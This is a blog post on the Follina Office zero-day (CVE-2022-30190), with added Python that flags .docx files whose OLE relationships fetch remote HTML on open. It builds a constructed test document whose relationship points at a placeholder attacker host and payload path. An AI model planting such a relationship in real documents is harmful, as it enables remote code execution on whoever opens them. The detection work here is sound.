Zero-day threat using Microsoft Office documents – even if macros are disabled – it’s called Follina

I have written about the usefulness and the threat that Microsoft Office document macros can pose to your cyber security. This flaw, called Follina, exploits Office functionality to retrieve an HTML file from a remote server; that HTML then invokes the Microsoft Support Diagnostic Tool (MSDT) to run malicious code, which executes with the privileges of the user who opened the document (see the Microsoft advisory linked below).
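How the document pulls in the HTML is visible inside the file itself: a .docx is a zip package, and in the Follina samples the remote HTML was referenced by an OLE object relationship marked TargetMode="External" in word/_rels/document.xml.rels, which Word resolves as the file opens, with no macro involved. The Python below is an added example, not code from the original post or from any of the sources linked here. It builds two constructed in-memory documents (a benign one with an ordinary hyperlink, and one with the Follina-shaped external OLE relationship; the attacker.example hostname and payload.html path are placeholders) and scans every relationship part for http(s) targets that Word fetches automatically, skipping clickable hyperlinks so that normal documents are not flagged.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# OOXML relationship namespace and types (from the ECMA-376 package format).
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
HYPERLINK = REL_BASE + "hyperlink"  # only followed when the user clicks it
# Relationship types Word resolves on its own while the document loads.
AUTO_FETCHED = {REL_BASE + "oleObject", REL_BASE + "attachedTemplate"}


def find_external_fetches(docx_bytes: bytes) -> list[dict]:
    """List every non-hyperlink relationship that points at an http(s) resource."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(part))
            except ET.ParseError:
                continue  # unparseable rels part: out of scope for this check
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "")
                target = rel.get("Target", "")
                if rel_type == HYPERLINK:
                    continue  # ordinary link text, not fetched automatically
                if urlparse(target).scheme.lower() not in ("http", "https"):
                    continue
                hits.append({
                    "part": part,
                    "type": rel_type.rsplit("/", 1)[-1],
                    "target": target,
                    "auto_fetched": rel_type in AUTO_FETCHED,
                })
    return hits


def verdict(docx_bytes: bytes) -> str:
    """'block' if Word would fetch a remote resource on open, 'review' for other
    external http(s) references, 'clean' otherwise."""
    hits = find_external_fetches(docx_bytes)
    if any(h["auto_fetched"] for h in hits):
        return "block"
    return "review" if hits else "clean"


def build_docx(document_rels: str) -> bytes:
    """Assemble a minimal .docx in memory. Constructed test input, not a real sample."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        '</Types>'
    )
    root_rels = (
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{REL_BASE}officeDocument" Target="word/document.xml"/>'
        '</Relationships>'
    )
    document = (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body><w:p/></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("_rels/.rels", root_rels)
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


# Constructed benign document: one ordinary hyperlink to a website.
BENIGN = build_docx(
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId2" Type="{HYPERLINK}" Target="https://example.com/" TargetMode="External"/>'
    '</Relationships>'
)

# Constructed Follina-shaped document: an OLE object whose target is a remote HTML
# page (placeholder hostname and path, not those seen in real samples).
FOLLINA_SHAPE = build_docx(
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId2" Type="{REL_BASE}oleObject" Target="http://attacker.example/payload.html!" TargetMode="External"/>'
    '</Relationships>'
)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("follina-shape", FOLLINA_SHAPE)):
        print(label, verdict(doc), find_external_fetches(doc))
```

Run it as a script to see the verdict for each constructed sample, or call verdict() on the bytes of a real attachment to triage it without opening it in Word. A hit only shows that the document reaches out to the network as it opens, not what it gets back, so treat "block" as a reason to quarantine and inspect, not as proof of a payload.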

Microsoft Word struck by zero-day vulnerability • The Register

First Exploitation of Follina Seen in the Wild – SANS Internet Storm Centre

There is no patch for this attack at the moment; the Microsoft advisory linked below only offers a workaround (disabling the MSDT URL protocol handler), so there is no complete technical defence yet.

The worst thing about this exploit is that it works even when macros are disabled. Disabling macros was a positive step in your cyber security defences, but it is now clear that it is no longer enough on its own.

At the moment, the Word documents carrying this attack open as a blank page, though that may not stay the case. If you do see the blank page, it is probably already too late: the malicious content is fetched as the document loads.

The best thing to do at the moment is to not open any even marginally suspect Office documents, and to exercise extreme care when opening ones from people you trust, since their accounts may be compromised.

Clive Catton MSc (Cyber Security) – by-line and other articles

Further Reading

The post below covers the same threat as this one, in less technical terms, so that everyone can take steps to defend against it.

New attack using Microsoft Office documents – could you or your team recognise it? – Smart Thinking Solutions

CVE-2022-30190 – Security Update Guide – Microsoft – Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability
